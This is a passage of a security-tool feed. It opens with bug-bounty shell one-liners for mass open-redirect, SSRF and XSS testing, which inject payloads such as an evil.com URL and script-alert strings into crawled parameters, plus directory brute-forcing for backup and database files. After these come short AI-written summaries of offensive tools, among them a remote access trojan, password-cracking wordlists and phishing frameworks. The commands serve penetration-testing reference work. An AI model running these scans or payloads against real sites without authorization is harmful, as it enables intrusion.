&lt;pre tabindex="0"&gt;&lt;code&gt;echo target.com | (gau || hakrawler || waybackurls || katana) | grep -a -i \=http | qsreplace &amp;#39;http://evil.com&amp;#39; | while read host do;do curl -s -L $host -I | grep &amp;#34;http://evil.com&amp;#34; &amp;amp;&amp;amp; echo -e &amp;#34;$host \033[0;31mVulnerable\n&amp;#34; ;done
&lt;/code&gt;&lt;/pre&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;cat subs.txt | (gau || hakrawler || waybackurls || katana) | grep &amp;#34;=&amp;#34; | dedupe | qsreplace &amp;#39;http://example.com&amp;#39; | httpx -fr -title -match-string &amp;#39;Example Domain&amp;#39;
&lt;/code&gt;&lt;/pre&gt;&lt;hr&gt;
&lt;h2 id="ssrf"&gt;SSRF:&lt;/h2&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;cat urls.txt | grep &amp;#34;=&amp;#34; | qsreplace &amp;#34;burpcollaborator_link&amp;#34; &amp;gt;&amp;gt; tmp-ssrf.txt; httpx -silent -l tmp-ssrf.txt -fr 
&lt;/code&gt;&lt;/pre&gt;&lt;hr&gt;
&lt;h2 id="xss"&gt;XSS:&lt;/h2&gt;
&lt;h3 id="knoxss-mass-hunting"&gt;Knoxss mass hunting&lt;/h3&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;file=$1; key=&amp;#34;API_KEY&amp;#34;; while read line; do curl https://api.knoxss.pro -d target=$line -H &amp;#34;X-API-KEY: $key&amp;#34; -s | grep PoC; done &amp;lt; $file
&lt;/code&gt;&lt;/pre&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;cat domains.txt | (gau || hakrawler || waybackurls || katana) | grep -Ev &amp;#34;\.(jpeg|jpg|png|ico|gif|css|woff|svg)$&amp;#34; | uro | grep = | qsreplace &amp;#34;&amp;lt;img src=x onerror=alert(1)&amp;gt;&amp;#34; | httpx -silent -nc -mc 200 -mr &amp;#34;&amp;lt;img src=x onerror=alert(1)&amp;gt;&amp;#34;
&lt;/code&gt;&lt;/pre&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;cat targets.txt | (gau || hakrawler || waybackurls || katana) | httpx -silent | Gxss -c 100 -p Xss | grep &amp;#34;URL&amp;#34; | cut -d &amp;#39;&amp;#34;&amp;#39; -f2 | sort -u | dalfox pipe
&lt;/code&gt;&lt;/pre&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;echo target.com | (gau || hakrawler || waybackurls || katana) | grep &amp;#39;=&amp;#39; |qsreplace &amp;#39;&amp;#34;&amp;gt;&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;&amp;#39; | while read host do ; do curl -s --path-as-is --insecure &amp;#34;$host&amp;#34; | grep -qs &amp;#34;&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;&amp;#34; &amp;amp;&amp;amp; echo &amp;#34;$host \033[0;31m&amp;#34; Vulnerable;done
&lt;/code&gt;&lt;/pre&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;cat urls.txt | grep &amp;#34;=&amp;#34; | sed &amp;#39;s/=.*/=/&amp;#39; | sed &amp;#39;s/URL: //&amp;#39; | tee testxss.txt ; dalfox file testxss.txt -b yours.xss.ht
&lt;/code&gt;&lt;/pre&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;cat subs.txt | awk &amp;#39;{print $3}&amp;#39;| httpx -silent | xargs -I@ sh -c &amp;#39;python3 http://xsstrike.py -u @ --crawl&amp;#39;
&lt;/code&gt;&lt;/pre&gt;&lt;hr&gt;
&lt;h2 id="hidden-dirs"&gt;Hidden Dirs:&lt;/h2&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;dirsearch -l ips_alive --full-url --recursive --exclude-sizes=0B --random-agent -e 7z,archive,ashx,asp,aspx,back,backup,backup-sql,backup.db,backup.sql,bak,bak.zip,bakup,bin,bkp,bson,bz2,core,csv,data,dataset,db,db-backup,db-dump,db.7z,db.bz2,db.gz,db.tar,db.tar.gz,db.zip,dbs.bz2,dll,dmp,dump,dump.7z,dump.db,dump.z,dump.zip,exported,gdb,gdb.dump,gz,gzip,ib,ibd,iso,jar,java,json,jsp,jspf,jspx,ldf,log,lz,lz4,lzh,mongo,neo4j,old,pg.dump,phtm,phtml,psql,rar,rb,rdb,rdb.bz2,rdb.gz,rdb.tar,rdb.tar.gz,rdb.zip,redis,save,sde,sdf,snap,sql,sql.7z,sql.bak,sql.bz2,sql.db,sql.dump,sql.gz,sql.lz,sql.rar,sql.tar.gz,sql.tar.z,sql.xz,sql.z,sql.zip,sqlite,sqlite.bz2,sqlite.gz,sqlite.tar,sqlite.tar.gz,sqlite.zip,sqlite3,sqlitedb,swp,tar,tar.bz2,tar.gz,tar.z,temp,tml,vbk,vhd,war,xhtml,xml,xz,z,zip,conf,config,bak,backup,swp,old,db,sql,asp,aspx~,asp~,py,py~,rb~,php,php~,bkp,cache,cgi,inc,js,json,jsp~,lock,wadl -o output.txt
&lt;/code&gt;&lt;/pre&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;ffuf -c -w urls.txt:URL -w wordlist.txt:FUZZ -u URL/FUZZ -mc all -fc 500,502 -ac -recursion -v -of json -o output.json
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id="ffuf-json-to-txt-output"&gt;ffuf json to txt output&lt;/h2&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;cat output.json | jq | grep -o &amp;#39;&amp;#34;url&amp;#34;: &amp;#34;http[^&amp;#34;]*&amp;#34;&amp;#39; | grep -o &amp;#39;http[^&amp;#34;]*&amp;#39; | anew out.txt
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;&lt;strong&gt;Search for Sensitive files from Wayback&lt;/strong&gt;&lt;/p&gt;</description></item><item><title>onedrive_user_enum</title><link>https://rainmana.github.io/hackyfeed/tools/nyxgeek-onedrive_user_enum/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/nyxgeek-onedrive_user_enum/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; onedrive_user_enum is a tool designed for enumerating valid OneDrive users by leveraging the HTTP response codes from file share URLs. Its primary use case is passive user enumeration, which avoids direct login attempts, making it less detectable by the target organization. Notable features include options for remote logging to MySQL, local SQLite database support, user list truncation, and mechanisms for de-duplication and user list management.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="onedrive_user_enum-v210"&gt;onedrive_user_enum v2.10&lt;/h1&gt;
&lt;p&gt;enumerate valid onedrive users&lt;/p&gt;</description></item><item><title>open-semantic-search</title><link>https://rainmana.github.io/hackyfeed/tools/opensemanticsearch-open-semantic-search/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/opensemanticsearch-open-semantic-search/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Open Semantic Search is an integrated search server and ETL framework designed for comprehensive document processing, including crawling, text extraction, text analysis, and named entity recognition—fully supporting various search functionalities such as fulltext, faceted, exploratory, and knowledge graph searches. Notable features include Docker container support, the ability to generate search user interfaces, and extensive automated testing capabilities, enabling seamless integration and deployment. This tool is particularly valuable for organizations needing robust, customizable search solutions across diverse data types and sources.&lt;/p&gt;</description></item><item><title>openappsec</title><link>https://rainmana.github.io/hackyfeed/tools/openappsec-openappsec/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/openappsec-openappsec/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; open-appsec is a machine learning-based web application and API threat protection tool designed to guard against OWASP Top 10 vulnerabilities and zero-day attacks. It employs a dual-phase evaluation process using both supervised and unsupervised models to intelligently assess the legitimacy of HTTP requests based on user interaction patterns and predefined attack indicators. Notable features include support for deployment on Linux, Docker, and Kubernetes environments, along with flexible management options through declarative configuration, Helm charts, and a SaaS web interface.&lt;/p&gt;</description></item><item><title>opensquat</title><link>https://rainmana.github.io/hackyfeed/tools/atenreiro-opensquat/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/atenreiro-opensquat/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; openSquat is an open-source intelligence (OSINT) tool designed to identify cyber squatting threats against brands or domains. It leverages advanced detection techniques, such as similarity detection using the Levenshtein distance algorithm, and integrates with services like VirusTotal for domain reputation checks. Key features include daily updates on newly registered domains, DNS validation, and multiple output formats, enhancing its utility for security professionals monitoring potential domain-related threats.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p align="center"&gt;
 &lt;img src="https://raw.githubusercontent.com/atenreiro/opensquat/master/screenshots/openSquat_logo.png" alt="openSquat Logo" width="400"/&gt;
&lt;/p&gt;</description></item><item><title>operative-framework</title><link>https://rainmana.github.io/hackyfeed/tools/graniet-operative-framework/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/graniet-operative-framework/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Operative Framework is a digital investigation tool designed for interacting with multiple targets, executing a variety of modules, and managing links with these targets. Its notable features include the ability to export reports in PDF format, support for crafting custom modules, and a RESTful API for integration, all underpinned by a redesigned architecture in Rust for enhanced performance and functionality.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;img src="https://i.ibb.co/ZBf2T77/PNG.png" width="200"&gt;
&lt;p&gt;&lt;strong&gt;operative framework&lt;/strong&gt; is a digital investigation framework, you can interact with multiple targets, execute multiple modules, create links with target, export rapport to PDF file, add note to target or results, interact with RESTFul API, write your own modules.&lt;/p&gt;</description></item><item><title>OSCP</title><link>https://rainmana.github.io/hackyfeed/tools/0xsyr0-oscp/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/0xsyr0-oscp/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The OSCP Cheat Sheet repository provides a comprehensive collection of essential commands and techniques specifically tailored for the Offensive Security Certified Professional (OSCP) exam. It includes updates on advanced exploitation methods such as Active Directory Certificate Services abuse and Shadow Credentials attacks, alongside practical resources for information gathering, vulnerability analysis, and exploitation strategies. The tool aims to assist users in navigating the exam requirements while emphasizing the importance of adhering to current exam guidelines.&lt;/p&gt;</description></item><item><title>OSCP-Tricks</title><link>https://rainmana.github.io/hackyfeed/tools/rodolfomarianocy-oscp-tricks/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/rodolfomarianocy-oscp-tricks/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; OSCP Tricks is a comprehensive resource designed to assist penetration testers preparing for the Offensive Security Certified Professional (OSCP) exam. It encompasses various techniques across critical areas such as information gathering, web application attacks, privilege escalation on both Linux and Windows systems, and more, supplemented with external links to useful tutorials and methodologies. Notable features include categorized attack vectors, detailed enumeration guides, and checklists to streamline the penetration testing process.&lt;/p&gt;</description></item><item><title>Osintgram</title><link>https://rainmana.github.io/hackyfeed/tools/datalux-osintgram/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/datalux-osintgram/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Osintgram is a Python-based OSINT tool designed for reconnaissance on Instagram, enabling users to collect and analyze public data from Instagram accounts by username. Key features include retrieving followers, followed accounts, post information, comments, captions, and downloading media such as photos and stories. The tool operates through an interactive shell, providing a comprehensive suite of commands for in-depth investigation while emphasizing the importance of ethical usage.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="osintgram-"&gt;Osintgram 🔎📸&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://github.com/Datalux/Osintgram/releases/tag/1.3"&gt;&lt;img src="https://img.shields.io/badge/version-1.3-green" alt="version-1.3"&gt;&lt;/a&gt;
&lt;a href="https://img.shields.io/badge/license-GPLv3-blue"&gt;&lt;img src="https://img.shields.io/badge/license-GPLv3-blue" alt="GPLv3"&gt;&lt;/a&gt;
&lt;a href="https://img.shields.io/badge/language-Python3-red"&gt;&lt;img src="https://img.shields.io/badge/language-Python3-red" alt="Python3"&gt;&lt;/a&gt;
&lt;a href="https://t.me/osintgram"&gt;&lt;img src="https://img.shields.io/badge/Telegram-Channel-blue.svg" alt="Telegram"&gt;&lt;/a&gt;
&lt;a href="https://img.shields.io/badge/Docker-Supported-blue"&gt;&lt;img src="https://img.shields.io/badge/Docker-Supported-blue" alt="Docker"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>osmedeus</title><link>https://rainmana.github.io/hackyfeed/tools/j3ssie-osmedeus/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/j3ssie-osmedeus/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Osmedeus is a security-focused orchestration engine designed for automating complex workflows through declarative YAML definitions, enhancing the audibility and management of security tasks. It features distributed execution, a rich library of over 80 utility functions, and supports cloud infrastructure provisioning for robust penetration testing and scanning. Key functionalities include event-driven scheduling, agentic LLM integration for tool orchestration, and a REST API for seamless integration and visualization through a web interface.&lt;/p&gt;</description></item><item><title>paradoxiaRAT</title><link>https://rainmana.github.io/hackyfeed/tools/quantumcore-paradoxiarat/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/quantumcore-paradoxiarat/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Paradoxia is a Remote Access Tool (RAT) designed for covert control of target systems, featuring a user-friendly console that allows users to easily build and deploy client applications. Notable capabilities include multithreading for multiple session management, full file access, keylogging, microphone recording, and remote execution commands, alongside stealth operation and persistent installation. This tool is intended for malicious use, as indicated by its detection as malware by security software.&lt;/p&gt;</description></item><item><title>Passhunt</title><link>https://rainmana.github.io/hackyfeed/tools/viralmaniar-passhunt/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/viralmaniar-passhunt/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Passhunt is a tool designed to search for default credentials across network devices and web applications from a database of 523 vendors and 2084 default passwords. It facilitates quick access to these credentials through a simple command-line interface, allowing users to select vendors and retrieve associated default passwords efficiently. Notable features include the comprehensive vendor database and the ease of installation and usage with Python.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="passhunt"&gt;Passhunt&lt;/h1&gt;
&lt;p&gt;Passhunt is a simple tool for searching of default credentials for network devices, web applications and more. Search through 523 vendors and their 2084 default passwords.&lt;/p&gt;</description></item><item><title>passphrase-wordlist</title><link>https://rainmana.github.io/hackyfeed/tools/initstring-passphrase-wordlist/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/initstring-passphrase-wordlist/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The &lt;code&gt;passphrase-wordlist&lt;/code&gt; project provides an extensive list of over 20 million phrases paired with two hashcat rule files tailored for GPU-based password cracking. Its primary use case is to enhance the effectiveness of hashcat&amp;rsquo;s cracking capabilities by generating numerous permutations of passphrases to exploit vulnerabilities in systems that utilize weak or common passwords. Notable features include a robust wordlist sourced from various databases and dynamic updates, along with customizable rule files that manipulate passphrase formatting for improved cracking success.&lt;/p&gt;</description></item><item><title>PasswordPusher</title><link>https://rainmana.github.io/hackyfeed/tools/pglombardo-passwordpusher/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/pglombardo-passwordpusher/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Password Pusher is an open-source web application designed for securely sharing sensitive information such as passwords, notes, files, and URLs via self-destructing links. Its notable features include encrypted storage, customizable expiry controls, comprehensive audit logging, and the ability to self-host or utilize a hosted service, making it suitable for individual users and teams. The tool supports multiple languages and offers integrations through a JSON API and command-line interface, enhancing its versatility in secure information sharing.&lt;/p&gt;</description></item><item><title>pe-bear</title><link>https://rainmana.github.io/hackyfeed/tools/hasherezade-pe-bear/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/hasherezade-pe-bear/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; PE-bear is a multiplatform reversing tool designed for analyzing PE (Portable Executable) files, focusing on providing a quick and flexible initial inspection for malware analysts. It supports handling malformed PE files and comes equipped with an updated signature database from PEiD, enhancing its detection capabilities. Additionally, PE-bear can be easily installed on various platforms, including Windows and Linux, and is compatible with multiple package managers.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h2 id="pe-bear"&gt;PE-bear&lt;/h2&gt;
&lt;img src="./logo/main_ico.png" alt="PE-bear logo" width=128&gt;
&lt;p&gt;&lt;a href="https://ci.appveyor.com/project/hasherezade/pe-bear"&gt;&lt;img src="https://ci.appveyor.com/api/projects/status/q2smuy32pqqo0oyn?svg=true" alt="Build status"&gt;&lt;/a&gt;
&lt;a href="https://app.codacy.com/gh/hasherezade/pe-bear/dashboard?utm_source=gh&amp;amp;utm_medium=referral&amp;amp;utm_content=&amp;amp;utm_campaign=Badge_grade"&gt;&lt;img src="https://app.codacy.com/project/badge/Grade/14648384b52b4d979bc1f2246edbd496" alt="Codacy Badge"&gt;&lt;/a&gt;
&lt;a href="https://www.gnu.org/licenses/old-licenses/gpl-2.0.en.html"&gt;&lt;img src="https://img.shields.io/badge/License-GPL_v2-blue.svg" alt="License: GPL v2"&gt;&lt;/a&gt;
&lt;a href="https://github.com/hasherezade/pe-bear/commits"&gt;&lt;img src="https://img.shields.io/github/last-commit/hasherezade/pe-bear/main" alt="Last Commit"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>pe-sieve</title><link>https://rainmana.github.io/hackyfeed/tools/hasherezade-pe-sieve/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/hasherezade-pe-sieve/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; PE-sieve is a lightweight malware detection tool that scans individual processes for malicious implants such as injected PEs, shellcodes, and various in-memory modifications. It effectively identifies techniques like Process Hollowing and Reflective DLL Injection, allowing for the extraction and analysis of detected threats. Additionally, PE-sieve can be integrated as a DLL with a simple API for use in other applications, enhancing its versatility in malware analysis workflows.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;img src="./logo/PE-SIEVE_small.png" alt=""&gt;
&lt;p&gt;&lt;a href="https://ci.appveyor.com/project/hasherezade/pe-sieve"&gt;&lt;img src="https://ci.appveyor.com/api/projects/status/crlo8iyvi4bm80yp?svg=true" alt="Build status"&gt;&lt;/a&gt;
&lt;a href="https://app.codacy.com/gh/hasherezade/pe-sieve/dashboard?branch=master"&gt;&lt;img src="https://api.codacy.com/project/badge/Grade/b75fd4d95bd94629879381241e4a7c02" alt="Codacy Badge"&gt;&lt;/a&gt;
&lt;a href="https://github.com/hasherezade/pe-sieve/commits"&gt;&lt;img src="https://img.shields.io/github/commit-activity/m/hasherezade/pe-sieve" alt="Commit activity"&gt;&lt;/a&gt;
&lt;a href="https://github.com/hasherezade/pe-sieve/commits"&gt;&lt;img src="https://img.shields.io/github/last-commit/hasherezade/pe-sieve/master" alt="Last Commit"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>Penetration_Testing_POC</title><link>https://rainmana.github.io/hackyfeed/tools/mr-xn-penetration_testing_poc/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/mr-xn-penetration_testing_poc/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Penetration_Testing_POC is a comprehensive collection of proof of concepts (POCs), scripts, tools, and articles related to penetration testing, intended to serve as a reference resource. It systematically categorizes vulnerabilities across various domains such as IoT, mobile devices, web applications, and privilege escalation methods, providing users with essential insights and practical exploitation techniques. Notable features include organized documentation and links to external resources, ensuring that users can easily navigate and leverage the provided information for security assessments.&lt;/p&gt;</description></item><item><title>penetration-testing-cheat-sheet</title><link>https://rainmana.github.io/hackyfeed/tools/ivan-sincek-penetration-testing-cheat-sheet/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ivan-sincek-penetration-testing-cheat-sheet/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Penetration Testing Cheat Sheet is a comprehensive checklist designed to assist cybersecurity professionals in performing penetration testing tasks. It aggregates various tools and techniques for phases such as reconnaissance, scanning, and vulnerability exploitation, while emphasizing the importance of complementarity among tools for better results. Noteworthy features include automation of certain tasks and links to crucial resources for penetration testing methodologies.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="penetration-testing-cheat-sheet"&gt;Penetration Testing Cheat Sheet&lt;/h1&gt;
&lt;p&gt;This is more of a checklist for myself. May contain useful tips and tricks.&lt;/p&gt;</description></item><item><title>Penetration-Testing-Tools</title><link>https://rainmana.github.io/hackyfeed/tools/mgeeky-penetration-testing-tools/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/mgeeky-penetration-testing-tools/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Penetration Testing Tools repository is a comprehensive collection of over 160 scripts, utilities, and cheatsheets designed for Penetration Testing and IT security audits. It encompasses a wide range of categories including cloud assessments, network protocols, web security, and red teaming, enabling practitioners to increase efficiency and improve technical assurance in their engagements. Notable features include modular organization by function, a focus on real-world applicability, and the absence of sensitive client-specific information.&lt;/p&gt;</description></item><item><title>pentagi</title><link>https://rainmana.github.io/hackyfeed/tools/vxcontrol-pentagi/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/vxcontrol-pentagi/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; PentAGI is an AI-powered penetration testing framework that automates security assessments for information security professionals and researchers. Notable features include a fully autonomous AI agent capable of executing penetration test steps, integration with over 20 professional tools, a smart memory system for storing results, and comprehensive monitoring and reporting capabilities. The tool operates within a secure Docker environment and includes a modern web interface along with APIs for automation and integration, making it a flexible solution for advanced cybersecurity testing.&lt;/p&gt;</description></item><item><title>pentest-tools</title><link>https://rainmana.github.io/hackyfeed/tools/gwen001-pentest-tools/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/gwen001-pentest-tools/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; pentest-tools is a collection of customizable security scripts designed for quick penetration testing needs, facilitating various tasks in security assessments. Notable features include domain enumeration, CORS vulnerability testing, subdomain extraction, and DNS requests handling, all provided in multiple programming languages such as Bash, Python, and PHP for versatile usability. This toolkit streamlines common pentesting workflows with efficient tools aimed at both novice and experienced security professionals.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 align="center"&gt;pentest-tools&lt;/h1&gt;
&lt;h4 align="center"&gt;A collection of custom security tools for quick needs.&lt;/h4&gt;
&lt;p align="center"&gt;
 &lt;img src="https://img.shields.io/badge/-bash-gray" alt="bash badge"&gt;
 &lt;img src="https://img.shields.io/badge/python-v3-blue" alt="python badge"&gt;
 &lt;img src="https://img.shields.io/badge/php-%3E=5.5-blue" alt="php badge"&gt;
 &lt;img src="https://img.shields.io/badge/license-MIT-green" alt="MIT license badge"&gt;
 &lt;a href="https://twitter.com/intent/tweet?text=https%3a%2f%2fgithub.com%2fgwen001%2fpentest-tools%2f" target="_blank"&gt;&lt;img src="https://img.shields.io/twitter/url?style=social&amp;url=https%3A%2F%2Fgithub.com%2Fgwen001%2Fpentest-tools" alt="twitter badge"&gt;&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Pentest-Windows</title><link>https://rainmana.github.io/hackyfeed/tools/arch3rpro-pentest-windows/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/arch3rpro-pentest-windows/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Pentest-Windows11 v3.2 is a Windows penetration testing environment tailored for deployment on Mac M series chips and other platforms, integrating over 400 commonly used security tools and scripts. Notable features include support for multiple virtualization formats (VMware, Parallels Desktop, Hyper-V), optimized tool management, and a user-friendly interface, enabling efficient vulnerability assessment and penetration testing workflows. The environment is designed to be ready-to-use, allowing security professionals to conduct testing with minimal setup.&lt;/p&gt;</description></item><item><title>pentestagent</title><link>https://rainmana.github.io/hackyfeed/tools/gh05tcrew-pentestagent/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/gh05tcrew-pentestagent/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; PentestAgent is an AI-driven penetration testing tool designed to assist cybersecurity professionals in conducting thorough security assessments. It features multiple operational modes, including single-task assistance, autonomous task execution, and multi-agent orchestration, allowing users to adapt their approach based on project complexity. The tool supports integration with platforms like OpenAI and Anthropic, and can be run in Docker for enhanced isolation and access to a suite of pre-installed pentesting tools.&lt;/p&gt;</description></item><item><title>PentestTools</title><link>https://rainmana.github.io/hackyfeed/tools/arch3rpro-pentesttools/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/arch3rpro-pentesttools/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Pentest Tools is a comprehensive catalog of penetration testing resources, referencing tools primarily from Kali Linux, and featuring both open-source and readily accessible software. It includes a wide array of categories such as information gathering, vulnerability analysis, and exploitation tools, aimed at facilitating various aspects of security assessments. Notable features include a curated list of essential tools, categorized functionalities, and a long-term commitment to updates and supplementary resources.&lt;/p&gt;</description></item><item><title>phishing-frenzy</title><link>https://rainmana.github.io/hackyfeed/tools/pentestgeek-phishing-frenzy/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/pentestgeek-phishing-frenzy/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Phishing Frenzy is a Ruby on Rails-based framework designed for creating and managing phishing campaigns. Its primary use case is to facilitate penetration testing by simulating phishing attacks, allowing security professionals to assess and improve their organization&amp;rsquo;s defenses against such threats. Notable features include user-friendly documentation and tools for managing phishing emails and tracking user interactions.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="phishing-frenzy"&gt;Phishing Frenzy&lt;/h1&gt;
&lt;p&gt;Ruby on Rails Phishing Framework&lt;/p&gt;
&lt;p&gt;&lt;img src="http://i.imgur.com/pt4JHb4.png" alt="PhishingFrenzy"&gt;&lt;/p&gt;
&lt;h2 id="documentation--info"&gt;Documentation &amp;amp; Info&lt;/h2&gt;
&lt;p&gt;Relevant up to date documentation can be found on the official Phishing Frenzy website located below&lt;/p&gt;</description></item><item><title>PhoneSploit-Pro</title><link>https://rainmana.github.io/hackyfeed/tools/azeemidrisi-phonesploit-pro/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/azeemidrisi-phonesploit-pro/</guid><description>&lt;blockquote&gt;
